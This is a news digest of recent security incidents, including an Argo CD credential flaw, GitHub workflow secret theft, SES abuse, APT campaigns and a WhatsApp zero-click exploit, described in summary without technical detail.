A critical vulnerability in Argo CD allows low-privileged API tokens to retrieve all associated repository credentials, bypassing isolation mechanisms, enabling tokens with even basic 'get' permissions to access sensitive usernames and passwords. Exploitation can lead to cloning private codebases, injecting malicious manifests, and supply chain attacks, affecting all Argo CD versions up to 2.13.0.

The Czech National Cyber and Information Security Agency issued a formal warning regarding products and services transferring user and system data to China, citing legal frameworks that compel data sharing with the state, which enables remote administration and potential misuse by state interests. Threat intelligence indicates a significant increase in intrusion activity and cloud targeting by Chinese operations, highlighting supply chain risks.

A supply-chain attack on Salesloft Drift led to a data breach at Zscaler, exposing customer information, as attackers exploited stolen OAuth tokens to access Salesforce environments, highlighting the persistence and adaptability of threat actors. The breach underscores the need for vigilance against phishing and social engineering attacks, as well as the importance of securing API tokens and customer authentication protocols.

A recent phishing campaign leveraged compromised AWS keys to weaponize Amazon Simple Email Service (SES), demonstrating novel techniques to bypass default restrictions and achieve industrial-scale email delivery, with attackers abusing the `PutAccountDetails` API to push SES accounts into production mode. The campaign utilized programmatic API calls and attempted privilege escalation, indicating sophisticated, automated tradecraft.

A widespread supply chain attack, dubbed 'GhostAction,' compromised hundreds of GitHub repositories by injecting malicious workflow files to exfiltrate over 3,325 CI/CD secrets, including publishing tokens and cloud credentials, which led to attempts to access AWS environments and database services. The campaign affected 327 developers across 817 repositories, impacting projects in multiple programming languages and entire SDK portfolios.

A newly identified APT group, Noisy Bear, is conducting a highly targeted campaign against Kazakhstan's energy sector, employing sophisticated social engineering and a multi-stage infection chain, utilizing open-source offensive tools and infrastructure from a sanctioned Russian hosting provider. The group uses spear-phishing from compromised internal accounts to deliver malicious LNK files and inject Meterpreter shellcode.

A zero-day vulnerability in WhatsApp iOS and macOS clients was exploited in a sophisticated zero-click attack chain, allowing remote attackers to deliver spyware without user interaction, and security experts recommend urgent updates and device resets to mitigate the risk. The attack highlights a rising trend of advanced threat actors chaining multiple zero-day vulnerabilities to evade security controls and achieve device compromise.